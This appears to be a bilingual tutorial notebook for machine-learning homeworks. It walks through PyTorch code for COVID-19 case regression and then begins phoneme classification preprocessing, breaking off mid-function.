    --2023-05-02 06:43:11--  https://www.dropbox.com/s/lmy1riadzoy0ahw/covid.train.csv?dl=0Resolving www.dropbox.com (www.dropbox.com)... 162.125.1.18, 2620:100:6016:18::a27d:112Connecting to www.dropbox.com (www.dropbox.com)|162.125.1.18|:443... connected.HTTP request sent, awaiting response... 302 FoundLocation: /s/raw/lmy1riadzoy0ahw/covid.train.csv [following]--2023-05-02 06:43:11--  https://www.dropbox.com/s/raw/lmy1riadzoy0ahw/covid.train.csvReusing existing connection to www.dropbox.com:443.HTTP request sent, awaiting response... 302 FoundLocation: https://uc5421dd31d98edf16e9af0f0b3d.dl.dropboxusercontent.com/cd/0/inline/B7R_XAdqGQ7y45IwWWr91JE9O5ftQ1LzcdRGRkGnWhDV7CbEgZ1gwBymu8fh5bpaPWp9zICKowq6MjrON0BR4nSmqUicNGD370j62Mq2GXwtl0e-8qpV5Oi-x6JOi1bcQMGLMbska_B9vEIgQgpg2S6ny5XiLPOameEMqLg9dA_Eog/file# [following]--2023-05-02 06:43:11--  https://uc5421dd31d98edf16e9af0f0b3d.dl.dropboxusercontent.com/cd/0/inline/B7R_XAdqGQ7y45IwWWr91JE9O5ftQ1LzcdRGRkGnWhDV7CbEgZ1gwBymu8fh5bpaPWp9zICKowq6MjrON0BR4nSmqUicNGD370j62Mq2GXwtl0e-8qpV5Oi-x6JOi1bcQMGLMbska_B9vEIgQgpg2S6ny5XiLPOameEMqLg9dA_Eog/fileResolving uc5421dd31d98edf16e9af0f0b3d.dl.dropboxusercontent.com (uc5421dd31d98edf16e9af0f0b3d.dl.dropboxusercontent.com)... 162.125.1.15, 2620:100:6016:15::a27d:10fConnecting to uc5421dd31d98edf16e9af0f0b3d.dl.dropboxusercontent.com (uc5421dd31d98edf16e9af0f0b3d.dl.dropboxusercontent.com)|162.125.1.15|:443... connected.HTTP request sent, awaiting response... 200 OKLength: 2162766 (2.1M) [text/plain]Saving to: ‘covid_train.csv’covid_train.csv     100%[===================>]   2.06M  4.86MB/s    in 0.4s    2023-05-02 06:43:12 (4.86 MB/s) - ‘covid_train.csv’ saved [2162766/2162766]--2023-05-02 06:43:13--  https://www.dropbox.com/s/zalbw42lu4nmhr2/covid.test.csv?dl=0Resolving www.dropbox.com (www.dropbox.com)... 162.125.1.18, 2620:100:6016:18::a27d:112Connecting to www.dropbox.com (www.dropbox.com)|162.125.1.18|:443... connected.HTTP request sent, awaiting response... 302 FoundLocation: /s/raw/zalbw42lu4nmhr2/covid.test.csv [following]--2023-05-02 06:43:13--  https://www.dropbox.com/s/raw/zalbw42lu4nmhr2/covid.test.csvReusing existing connection to www.dropbox.com:443.HTTP request sent, awaiting response... 302 FoundLocation: https://uc77577a7cac975663cf90524f71.dl.dropboxusercontent.com/cd/0/inline/B7T1uyyfVM4P3twEWZx3H4-pVXJ-c4Y5vMd0jVufeZ8aideA5_Zpgz2vdLvJjQsnLRbk7gffgKO4b2TWtNHYcAbfYb4YLQNQd7oa3etDtxXpWd1xxwoSg_emm6WNprlrzqzAFbQVh448Xp2PGEai1MO7BatFrLvH4to5CoOCRBs9Zg/file# [following]--2023-05-02 06:43:13--  https://uc77577a7cac975663cf90524f71.dl.dropboxusercontent.com/cd/0/inline/B7T1uyyfVM4P3twEWZx3H4-pVXJ-c4Y5vMd0jVufeZ8aideA5_Zpgz2vdLvJjQsnLRbk7gffgKO4b2TWtNHYcAbfYb4YLQNQd7oa3etDtxXpWd1xxwoSg_emm6WNprlrzqzAFbQVh448Xp2PGEai1MO7BatFrLvH4to5CoOCRBs9Zg/fileResolving uc77577a7cac975663cf90524f71.dl.dropboxusercontent.com (uc77577a7cac975663cf90524f71.dl.dropboxusercontent.com)... 162.125.1.15, 2620:100:6016:15::a27d:10fConnecting to uc77577a7cac975663cf90524f71.dl.dropboxusercontent.com (uc77577a7cac975663cf90524f71.dl.dropboxusercontent.com)|162.125.1.15|:443... connected.HTTP request sent, awaiting response... 200 OKLength: 638359 (623K) [text/plain]Saving to: ‘covid_test.csv’covid_test.csv      100%[===================>] 623.40K  --.-KB/s    in 0.04s   2023-05-02 06:43:14 (16.9 MB/s) - ‘covid_test.csv’ saved [638359/638359]

    Import packages

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    # Numerical Operations 数值运算
    import math
    import numpy as np

    # Reading/Writing Data 读写数据
    import pandas as pd
    import os
    import csv

    # For Progress Bar 进度条
    from tqdm import tqdm

    # Pytorch
    import torch
    import torch.nn as nn
    from torch.utils.data import Dataset, DataLoader, random_split

    # For plotting learning curve 绘制损失函数曲线
    from torch.utils.tensorboard import SummaryWriter

    Some Utility Functions

    一些实用程序函数

    You do not need to modify this part.

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    def same_seed(seed): 
    '''
    Fixes random number generator seeds for reproducibility.
    固定随机数种子以获得可复现性。
    '''
    torch.backends.cudnn.deterministic = True # 将 CuDNN 的随机性设置为确定性模式,这是为了确保每次运行时 CuDNN 生成的随机数列是一样的。
    torch.backends.cudnn.benchmark = False # 禁用 CuDNN 的自动调整功能,避免出现由于 CuDNN 自动调整导致的运行时间不稳定的情况。
    np.random.seed(seed) # 设置 NumPy 库的随机数种子,如果程序中有使用到 NumPy 生成的随机数,也可以保证其生成的随机数序列是一致的。
    torch.manual_seed(seed) # 设置 PyTorch 的 CPU 随机数种子。
    if torch.cuda.is_available(): # 如果 GPU 可用,则设置 PyTorch 的 GPU 随机数种子。
    torch.cuda.manual_seed_all(seed)

    def train_valid_split(data_set, valid_ratio, seed):
    '''
    Split provided training data into training set and validation set
    将提供的训练数据拆分为训练集和验证集
    '''
    valid_set_size = int(valid_ratio * len(data_set)) # 根据验证集所占比例和数据集的大小,计算出验证集的大小
    train_set_size = len(data_set) - valid_set_size # 通过数据集的总大小和验证集的大小计算出训练集的大小
    '''
    使用 random_split 函数将 data_set 随机划分为训练集和验证集,
    具体来说,
    函数的第一个参数是要划分的数据集,
    第二个参数是一个列表,表示训练集和验证集的大小,列表的元素按照训练集和验证集的顺序排列,
    第三个参数是用于生成随机数的生成器,需要手动设置随机数种子
    '''
    train_set, valid_set = random_split(data_set, [train_set_size, valid_set_size], generator=torch.Generator().manual_seed(seed))
    return np.array(train_set), np.array(valid_set) # 将训练集和验证集转换为 NumPy 数组格式,并返回

    def predict(test_loader, model, device):
    '''
    用于在给定的测试集上使用已训练好的神经网络模型进行预测并返回预测结果。
    test_loader:一个 PyTorch 的 DataLoader 对象,用于逐批次地加载测试数据;
    model:一个已训练好的神经网络模型;
    device:指定计算设备,如"cpu"或者"cuda"。
    '''
    model.eval() # Set your model to evaluation mode. 函数调用 model.eval()将模型设置为评估模式(即在推断过程中不会进行梯度计算,以加速运行)
    preds = [] # 定义一个空列表 preds 用于存储每个批次的预测结果。
    for x in tqdm(test_loader): # 通过一个循环来逐批次地遍历 test_loader 中的测试数据
    x = x.to(device) # 将当前的批次数据 x 移动到指定的设备上(如 GPU 设备)
    with torch.no_grad(): # 关闭梯度计算的上下文环境,以减少内存占用和加快计算速度
    pred = model(x) # 对当前批次的数据进行预测
    preds.append(pred.detach().cpu()) # 将预测结果 pred 附加到 preds 列表中
    '''
    在所有批次预测结束后,使用 torch.cat 函数将所有预测结果沿着指定维度(通常是批次维度)拼接成一个大的张量,并将其转换为 NumPy 数组格式返回
    '''
    preds = torch.cat(preds, dim=0).numpy()
    return preds

    Dataset

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    class COVID19Dataset(Dataset):
    '''
    x: Features. 特征
    y: Targets, if none, do prediction. 标签,如果为空,则做 prediction
    '''
    def __init__(self, x, y=None):
    if y is None:
    self.y = y # 设为 none
    else:
    self.y = torch.FloatTensor(y) # 转成 tensor 格式
    self.x = torch.FloatTensor(x)

    def __getitem__(self, idx):
    if self.y is None:
    return self.x[idx] # 返回标签
    else:
    return self.x[idx], self.y[idx] # 返回特征和对应的标签

    def __len__(self):
    return len(self.x) # 返回数据集长度

    Neural Network Model

    Try out different model architectures by modifying the class below.

    通过修改下面的类来尝试不同的模型体系结构。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    class My_Model(nn.Module):  # 声明了一个自定义的 PyTorch 神经网络模型,继承自 nn.Module
    def __init__(self, input_dim): # 定义了该神经网络模型的初始化方法。参数 input_dim 表示输入张量的维度
    super(My_Model, self).__init__() # 调用父类的初始化方法,即 nn.Module 中的__init__()方法,来初始化该自定义模型。
    # TODO: modify model's structure, be aware of dimensions.
    '''
    self.layers 声明了一个由多个层和激活函数组成的神经网络模型,
    用于传递输入数据并输出预测结果。
    其中,nn.Sequential()表示将多个层按顺序组合在一起,组成一个网络模型。
    3 个线性层,2 个 ReLU 激活函数
    '''
    self.layers = nn.Sequential(
    nn.Linear(input_dim, 16),
    nn.ReLU(),
    nn.Linear(16, 8),
    nn.ReLU(),
    nn.Linear(8, 1)
    )

    def forward(self, x):
    '''
    定义了该自定义神经网络模型的前向传播方法,即输入数据 x 经过一系列层和激活函数的变换之后,最终输出预测结果。
    '''
    x = self.layers(x) # 表示将输入数据 x 输入到 self.layers 中,进行多层次的线性变换和非线性激活。
    # 表示对最终输出的张量进行压缩,将形状为(batch_size, 1)的张量压缩为形状为(batch_size,)的张量,方便后续处理和计算损失值
    x = x.squeeze(1) # (B, 1) -> (B)
    return x

    Feature Selection

    Choose features you deem useful by modifying the function below.

    通过修改下面的功能来选择您认为有用的功能。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    def select_feat(train_data, valid_data, test_data, select_all=True):
    '''
    定义了一个函数 select_feat,该函数接受三个张量类型的输入参数 train_data、valid_data 和 test_data,
    分别表示训练数据集、验证数据集和测试数据集。
    另外,该函数还包含一个可选参数 select_all,默认为 True,表示是否选择全部特征列。
    '''
    '''Selects useful features to perform regression'''
    y_train, y_valid = train_data[:,-1], valid_data[:,-1] # 将原始的训练数据集和验证数据集中的标签列(最后一列)提取出来,分别赋值给变量 y_train 和 y_valid,用于后续的回归分析。
    '''
    将原始的训练数据集、验证数据集和测试数据集中除标签列之外的所有列提取出来,
    分别赋值给变量 raw_x_train、raw_x_valid 和 raw_x_test,用于后续的特征选择。
    '''
    raw_x_train, raw_x_valid, raw_x_test = train_data[:,:-1], valid_data[:,:-1], test_data

    if select_all:
    feat_idx = list(range(raw_x_train.shape[1])) # 将所有原始特征列的索引放入一个列表中,并赋值给变量 feat_idx
    else:
    feat_idx = [0,1,2,3,4] # TODO: Select suitable feature columns. 选择适当的特征列
    '''
    返回特征选择后的训练数据、验证数据和测试数据。
    其中,raw_x_train[:,feat_idx]表示从训练数据集中选择指定的特征列,
    raw_x_valid[:,feat_idx]表示从验证数据集中选择指定的特征列,
    raw_x_test[:,feat_idx]表示从测试数据集中选择指定的特征列,
    最后两个参数 y_train 和 y_valid 表示训练数据集和验证数据集的标签列。
    '''
    return raw_x_train[:,feat_idx], raw_x_valid[:,feat_idx], raw_x_test[:,feat_idx], y_train, y_valid

    Training Loop

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    def trainer(train_loader, valid_loader, model, config, device):
    # 定义了一个均方误差损失函数 MSELoss,用于计算模型预测结果和真实标签之间的差异。
    criterion = nn.MSELoss(reduction='mean') # Define your loss function, do not modify this.

    # Define your optimization algorithm. 定义你自己的优化函数
    # TODO: Please check https://pytorch.org/docs/stable/optim.html to get more available algorithms.
    # TODO: L2 regularization (optimizer(weight decay...) or implement by your self). L2 正则化(优化器(权重衰减…)或自行实现)。
    '''
    定义了一个随机梯度下降(SGD)优化器,用于优化模型的参数。
    其中,model.parameters()表示需要优化的模型参数,
    lr=config['learning_rate']表示学习率,
    momentum=0.7 表示使用动量法进行优化。
    '''
    optimizer = torch.optim.SGD(model.parameters(), lr=config['learning_rate'], momentum=0.7)
    writer = SummaryWriter() # Writer of tensoboard. 创建了一个 SummaryWriter 对象,用于将训练过程中的监控指标写入 tensorboard 日志文件。

    if not os.path.isdir('./models'):
    os.mkdir('./models') # Create directory of saving models. 创建一个文件夹以保存模型
    # 设置了几个变量,包括训练轮数 n_epochs、最佳损失值 best_loss、当前训练步数 step 和早停计数器 early_stop_count
    n_epochs, best_loss, step, early_stop_count = config['n_epochs'], math.inf, 0, 0

    for epoch in range(n_epochs): # 开始迭代训练,共进行 n_epochs 轮训练。
    model.train() # Set your model to train mode. 将模型切换为训练模式。
    loss_record = [] # 新建一个列表以存储每一个 epoch 损失函数的值。

    # tqdm is a package to visualize your training progress. 使用 tqdm 库创建一个进度条,用于可视化训练进度。
    train_pbar = tqdm(train_loader, position=0, leave=True)

    for x, y in train_pbar: # 开始迭代训练集,依次提取出输入特征 x 和标签 y。
    optimizer.zero_grad() # Set gradient to zero. 清零梯度,避免上一次的梯度对本次梯度的影响。
    x, y = x.to(device), y.to(device) # Move your data to device. 将输入特征 x 和标签 y 复制到 GPU 设备上进行加速计算。
    pred = model(x) # 将输入特征 x 输入到模型中,得到预测结果 pred。
    loss = criterion(pred, y) # 计算预测结果 pred 和真实标签 y 之间的误差,即损失函数值。
    loss.backward() # Compute gradient(backpropagation). 自动计算损失函数对各个参数的梯度。
    optimizer.step() # Update parameters. 通过优化器更新模型参数。
    step += 1
    loss_record.append(loss.detach().item()) # 将每一批次的损失函数值记录下来。

    # Display current epoch number and loss on tqdm progress bar.
    train_pbar.set_description(f'Epoch [{epoch+1}/{n_epochs}]') # 在进度条中显示当前轮数和总轮数。
    train_pbar.set_postfix({'loss': loss.detach().item()}) # 在进度条中显示当前批次的损失函数值。

    mean_train_loss = sum(loss_record)/len(loss_record) # 计算当前轮训练集的平均损失函数值。
    writer.add_scalar('Loss/train', mean_train_loss, step) # 将训练集的平均损失函数值写入 tensorboard 日志文件。

    model.eval() # Set your model to evaluation mode. 将模型切换为评估模式,用于对验证集进行预测和评估。
    loss_record = [] # 新建一个列表以存储每一个 epoch 损失函数的值。
    for x, y in valid_loader: # 开始迭代验证集,依次提取出输入特征 x 和标签 y。
    x, y = x.to(device), y.to(device) # 将输入特征 x 和标签 y 复制到 GPU 设备上进行加速计算。
    with torch.no_grad(): # 评估验证集的时候不改变模型参数,关闭梯度
    pred = model(x) # 将输入特征 x 输入到模型中,得到预测结果 pred。
    loss = criterion(pred, y) # 计算预测结果 pred 和真实标签 y 之间的误差,即损失函数值。

    loss_record.append(loss.item()) # 将每一批次的损失函数值记录下来。

    mean_valid_loss = sum(loss_record)/len(loss_record) # 计算当前轮验证集的平均损失函数值。
    # 打印当前轮的训练集和验证集的平均损失函数值。
    print(f'Epoch [{epoch+1}/{n_epochs}]: Train loss: {mean_train_loss:.4f}, Valid loss: {mean_valid_loss:.4f}')
    # writer.add_scalar('Loss/valid', mean_valid_loss, step)

    if mean_valid_loss < best_loss:
    '''
    如果当前轮的验证集平均损失函数值优于历史最佳值,则更新最佳损失值和最佳模型参数,并将模型保存到指定路径
    '''
    best_loss = mean_valid_loss
    torch.save(model.state_dict(), config['save_path']) # Save your best model
    print('Saving model with loss {:.3f}...'.format(best_loss))
    early_stop_count = 0
    else: # 如果当前轮的验证集平均损失函数值没有优于历史最佳值,则早停计数器加 1
    early_stop_count += 1

    if early_stop_count >= config['early_stop']: # 如果早停计数器超过早停阈值,则停止训练并返回
    print('\nModel is not improving, so we halt the training session.')
    return

    Configurations

    config contains hyper-parameters for training and the path to save your model.

    config 包含用于训练的超参数和保存模型的路径。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    device = 'cuda' if torch.cuda.is_available() else 'cpu'
    config = {
    'seed': 5201314, # Your seed number, you can pick your lucky number. :)
    'select_all': True, # Whether to use all features.
    'valid_ratio': 0.2, # validation_size = train_size * valid_ratio
    'n_epochs': 5000, # Number of epochs.
    'batch_size': 256,
    'learning_rate': 1e-5,
    'early_stop': 600, # If model has not improved for this many consecutive epochs, stop training. 若模型在这么多连续的时期内并没有得到改善,就停止训练。
    'save_path': './models/model.ckpt' # Your model will be saved here.
    }

    Dataloader

    Read data from files and set up training, validation, and testing sets. You do not need to modify this part.

    从文件中读取数据,并设置培训、验证和测试集。您不需要修改此部件。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    same_seed(config['seed'])  # 设置随机数种子,保证每次训练的结果可复现。
    # 从指定文件路径读取训练集和测试集数据,并将其转换成 numpy 数组的形式。
    train_data, test_data = pd.read_csv('./covid_train.csv').values, pd.read_csv('./covid_test.csv').values
    # 将训练集拆分为新的训练集和验证集,其中 train_valid_split()函数接受三个参数:原始训练集、验证集比例和随机数种子。
    train_data, valid_data = train_valid_split(train_data, config['valid_ratio'], config['seed'])

    # Print out the data size. 打印出训练集、验证集和测试集的大小。
    print(f"""train_data size: {train_data.shape}
    valid_data size: {valid_data.shape}
    test_data size: {test_data.shape}""")

    ## Select features
    '''
    选择特征,其中 select_feat()函数接受四个参数:
    训练集、验证集、测试集和是否选择所有特征(如果是,则选择所有特征;如果否,则根据一定规则筛选特征)。
    '''
    x_train, x_valid, x_test, y_train, y_valid = select_feat(train_data, valid_data, test_data, config['select_all'])

    # Print out the number of features.
    # 打印出特征数量。
    print(f'number of features: {x_train.shape[1]}')

    # 创建训练集、验证集和测试集的数据集。
    train_dataset, valid_dataset, test_dataset = COVID19Dataset(x_train, y_train), \
    COVID19Dataset(x_valid, y_valid), \
    COVID19Dataset(x_test)

    # Pytorch data loader loads pytorch dataset into batches.
    '''
    使用 PyTorch 提供的 DataLoader 将训练集数据集加载到内存中,并设置每个 batch 的大小、是否打乱顺序以及是否将数据存储在 GPU 显存中。
    同样,valid_loader 和 test_loader 也是通过 DataLoader 加载验证集和测试集数据集。
    '''
    train_loader = DataLoader(train_dataset, batch_size=config['batch_size'], shuffle=True, pin_memory=True)
    valid_loader = DataLoader(valid_dataset, batch_size=config['batch_size'], shuffle=True, pin_memory=True)
    test_loader = DataLoader(test_dataset, batch_size=config['batch_size'], shuffle=False, pin_memory=True)
    train_data size: (2408, 89) valid_data size: (601, 89) test_data size: (997, 88)number of features: 88

    Start training!

    1
    2
    model = My_Model(input_dim=x_train.shape[1]).to(device) # put your model and data on the same computation device.
    trainer(train_loader, valid_loader, model, config, device)
    Epoch [1/5000]: 100%|██████████| 10/10 [00:03<00:00,  3.26it/s, loss=131]Epoch [1/5000]: Train loss: 263.8631, Valid loss: 94.9638Saving model with loss 94.964...

    ……

    Epoch [998/5000]: Train loss: 3.8978, Valid loss: 6.7839Epoch [999/5000]: 100%|██████████| 10/10 [00:00<00:00, 135.57it/s, loss=2.35]

    Plot learning curves with tensorboard (optional)

    tensorboard is a tool that allows you to visualize your training progress.

    If this block does not display your learning curve, please wait for few minutes, and re-run this block. It might take some time to load your logging information.

    tensorboard 是一个工具,可以让你可视化你的训练进度。
    如果此块没有显示您的学习曲线,请等待几分钟,然后重新运行此块。加载日志信息可能需要一些时间。

    1
    2
    %reload_ext tensorboard
    %tensorboard --logdir=./runs/

    Testing

    The predictions of your model on testing set will be stored at pred.csv.

    您的模型在测试集上的预测将存储在 pred.csv 中。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    def save_pred(preds, file):
    '''
    Save predictions to specified file
    自定义函数 save_pred(),接受两个参数:预测结果和指定的文件路径。
    '''
    with open(file, 'w') as fp: # 使用指定的路径打开文件,以写入的模式打开('w')。
    writer = csv.writer(fp) # 使用 Python 标准库 csv 中的 writer()方法创建一个写入器
    writer.writerow(['id', 'tested_positive']) # 写入文件头。
    for i, p in enumerate(preds): # 循环遍历预测结果,并将每个样本的 ID 和预测值写入文件中。
    writer.writerow([i, p])

    model = My_Model(input_dim=x_train.shape[1]).to(device) # 创建一个名为 My_Model 的模型,其中 input_dim 是输入数据的特征维度。
    model.load_state_dict(torch.load(config['save_path'])) # 利用 PyTorch 提供的 load_state_dict()方法加载训练好的模型参数。
    preds = predict(test_loader, model, device) # 使用定义好的 predict()函数对测试集进行预测,其中 predict()函数接受三个参数:测试集的数据加载器、模型以及设备类型。
    save_pred(preds, 'pred.csv') # 将预测结果保存到指定文件中。

    Download

    Run this block to download the pred.csv automatically.

    1
    2
    from google.colab import files
    files.download('pred.csv')

    Reference

    This notebook uses code written by Heng-Jui Chang @ NTUEE (https://github.com/ga642381/ML2021-Spring/blob/main/HW01/HW01.ipynb)

    Homework 2: Phoneme Classification

    Task Description

    • Phoneme Classification
      • 音素分类
    • Training data: 3429 preprocessed audio features w/ labels (total 2116794 frames)
      • 训练数据:3429 个带标签的预处理音频特征(共 2116794 帧)
    • Testing data: 857 preprocessed audio features w/o labels (total 527364 frames)
      • 测试数据:857 个带标签(共 527364 帧)的预处理语音特征
    • Label: 41 classes, each class represents a phoneme
      • 标签:41 个类,每个类代表一个音素

    Objectives:

    • Solve a classification problem with deep neural networks (DNNs).
      • 使用 DNN 解决分类问题
    • Understand recursive neural networks (RNNs).

    Some Utility Functions

    Fixes random number generator seeds for reproducibility.

    固定随机数生成器种子以获得再现性。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    import numpy as np
    import torch
    import random

    def same_seeds(seed):
    random.seed(seed)
    np.random.seed(seed)
    torch.manual_seed(seed)
    if torch.cuda.is_available():
    torch.cuda.manual_seed(seed)
    torch.cuda.manual_seed_all(seed)
    torch.backends.cudnn.benchmark = False # 将 CuDNN 的随机性设置为确定性模式,这是为了确保每次运行时 CuDNN 生成的随机数列是一样的。
    torch.backends.cudnn.deterministic = True # 禁用 CuDNN 的自动调整功能,避免出现由于 CuDNN 自动调整导致的运行时间不稳定的情况。

    Helper functions to pre-process the training data from raw MFCC features of each utterance.

    辅助函数用于预处理来自每个话语的原始 MFCC 特征的训练数据。

    A phoneme may span several frames and is dependent to past and future frames.
    Hence we concatenate neighboring phonemes for training to achieve higher accuracy. The concat_feat function concatenates past and future k frames (total 2k+1 = n frames), and we predict the center frame.

    一个音素可能跨越几个帧,并依赖于过去和未来的帧。
    因此,我们将相邻的音素连接起来进行训练,以获得更高的精度。concat_filt函数连接过去和未来的 k 帧(总共 2k+1=n 帧),我们预测中心帧。

    Feel free to modify the data preprocess functions, but do not drop any frame (if you modify the functions, remember to check that the number of frames are the same as mentioned in the slides)

    可以随意修改数据预处理函数,但不要丢弃任何帧(如果修改函数,请记住检查帧数是否与幻灯片中提到的相同)

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    129
    130
    131
    132
    133
    134
    135
    136
    137
    138
    139
    140
    141
    142
    143
    144
    145
    146
    147
    148
    import os
    import torch
    from tqdm import tqdm

    def load_feat(path):
    feat = torch.load(path) # 用于加载已保存模型的函数。该函数接受一个文件路径参数,返回包含模型参数的 Python 字典对象。
    return feat

    def shift(x, n):
    '''
    shift 函数用来实现对一个一维或二维的 Tensor x 进行循环移位操作。其中,移位的距离为整数值 n,可以为正、负、零。

    repeat() 函数是用来对一个序列进行重复的函数,即将原序列中的元素按照指定次数进行重复。
    具体而言,对于一个具有 n 个元素的序列 x,
    调用 x.repeat(m) 函数可以得到一个新的序列,其中包含原序列 x 中的所有元素,每个元素均重复 m 次。
    例如,对于 [1, 2, 3] 序列执行 repeat(3) 操作后得到的序列为 [1, 2, 3, 1, 2, 3, 1, 2, 3]。
    '''
    if n < 0:
    '''
    如果 n < 0,表示向左移动,
    此时函数会将 x 最左侧的 n 个元素复制到 x 的最右侧,
    同时将 x 原来的前 n 个元素截取出来放到 x 的末尾;
    '''
    left = x[0].repeat(-n, 1)
    right = x[:n]
    elif n > 0:
    '''
    如果 n > 0,表示向右移动,
    此时函数会将 x 最右侧的 n 个元素复制到 x 的最左侧,
    同时将 x 原来的后 n 个元素截取出来放到 x 的开头;
    '''
    right = x[-1].repeat(n, 1)
    left = x[n:]
    else:
    '''
    如果 n = 0,表示不需要移位,直接返回原始的 x。
    '''
    return x
    # 使用 torch.cat() 函数将左右两个部分进行拼接,其中 dim=0 表示在第 0 维(即在行方向上)进行拼接。最后返回拼接后的结果。
    return torch.cat((left, right), dim=0)

    def concat_feat(x, concat_n):
    '''
    将输入的张量 x 沿着第 0 维进行拼接。
    具体而言,将原始的 seq_len x feature_dim 的二维张量,复制 concat_n 次后变为 seq_len x (concat_n*feature_dim) 的形状。
    将一个二维张量沿着第 0 维进行拼接,并实现了一些操作来保证拼接后的结果具有一定的对称性和规律性。
    '''
    # assert 语句会在程序中检查某个条件是否成立,如果不成立,就会抛出一个 AssertionError 异常,并给出错误信息。
    assert concat_n % 2 == 1 # n must be odd 对输入的 concat_n 进行判断,确保其为奇数
    if concat_n < 2: # 如果 concat_n 小于 2,则直接返回原始的张量 x。
    return x
    seq_len, feature_dim = x.size(0), x.size(1) # 对输入的张量获取其 seq_len 和 feature_dim(即第 0 维和第 1 维的大小)
    x = x.repeat(1, concat_n) # 使用 repeat() 函数将输入张量在第 1 维上重复 concat_n 次,得到一个新的形状为 seq_len x (concat_n * feature_dim) 的张量
    '''
    使用 view() 函数将张量重新变形,
    使得第 1 维大小为 concat_n,
    第 2 维大小为 seq_len,
    第 3 维大小为 feature_dim。
    然后使用 permute() 函数交换各维度的位置,使得张量的形状变为 (concat_n, seq_len, feature_dim)。
    '''
    x = x.view(seq_len, concat_n, feature_dim).permute(1, 0, 2) # concat_n, seq_len, feature_dim
    '''
    找到张量中心位置 mid = (concat_n // 2),并对从 mid+1 到最后的行进行循环,对这些行进行移位操作。
    具体来说,对于每一行,将其向右移动 r_idx 个位置,再将移位后的结果放到对称位置上。
    '''
    mid = (concat_n // 2)
    for r_idx in range(1, mid+1):
    x[mid + r_idx, :] = shift(x[mid + r_idx], r_idx)
    x[mid - r_idx, :] = shift(x[mid - r_idx], -r_idx)
    # 使用 permute() 和 view() 函数将张量恢复到 seq_len x (concat_n*feature_dim) 的形状,并返回拼接后的张量
    return x.permute(1, 0, 2).view(seq_len, concat_n * feature_dim)

    def preprocess_data(split, feat_dir, phone_path, concat_nframes, train_ratio=0.8):
    '''
    用于对数据集进行预处理。
    split: 数据集的划分,可选值为 'train'、'val' 和 'test'。
    feat_dir: 特征文件所在的目录。
    phone_path: 声音标签文件所在的目录。
    concat_nframes: 需要拼接的帧数。
    train_ratio: 训练集和验证集的划分比例,缺省值为 0.8。
    '''
    class_num = 41 # NOTE: pre-computed, should not need change 设置音素总数 class_num(注意,此处的值是预先计算好的,不需要更改)。

    # 根据 split 参数判断数据集模式 mode,如果是 'train' 或 'val',就设置为 'train',否则设置为 'test'。
    if split == 'train' or split == 'val':
    mode = 'train'
    elif split == 'test':
    mode = 'test'
    else:
    raise ValueError('Invalid \'split\' argument for dataset: PhoneDataset!')

    label_dict = {}
    if mode == 'train': # 如果是训练模式
    # 从标签文件中读取标签信息到字典 label_dict 中
    for line in open(os.path.join(phone_path, f'{mode}_labels.txt')).readlines():
    line = line.strip('\n').split(' ')
    label_dict[line[0]] = [int(p) for p in line[1:]]

    # split training and validation data
    # 从训练集划分文件中读取训练集和验证集的使用情况,并按照参数 train_ratio 进行划分。
    usage_list = open(os.path.join(phone_path, 'train_split.txt')).readlines()
    random.shuffle(usage_list)
    train_len = int(len(usage_list) * train_ratio)
    usage_list = usage_list[:train_len] if split == 'train' else usage_list[train_len:]

    elif mode == 'test':
    usage_list = open(os.path.join(phone_path, 'test_split.txt')).readlines()

    # 从数据划分文件中读取使用的文件名列表到 usage_list 中,然后将其格式化为标准格式(去除换行符)
    usage_list = [line.strip('\n') for line in usage_list]
    # 打印有关数据集的信息,包括电话类别总数和数据集划分情况。
    print('[Dataset] - # phone classes: ' + str(class_num) + ', number of utterances for ' + split + ': ' + str(len(usage_list)))

    # 初始化张量 X 和 y(仅在训练模式下)
    max_len = 3000000
    X = torch.empty(max_len, 39 * concat_nframes)
    if mode == 'train':
    y = torch.empty(max_len, dtype=torch.long)

    # 按顺序读入特征文件中的信息到 X 中,同时将标签信息读入到 y 中。
    idx = 0
    for i, fname in tqdm(enumerate(usage_list)):
    feat = load_feat(os.path.join(feat_dir, mode, f'{fname}.pt'))
    cur_len = len(feat)
    feat = concat_feat(feat, concat_nframes)
    if mode == 'train':
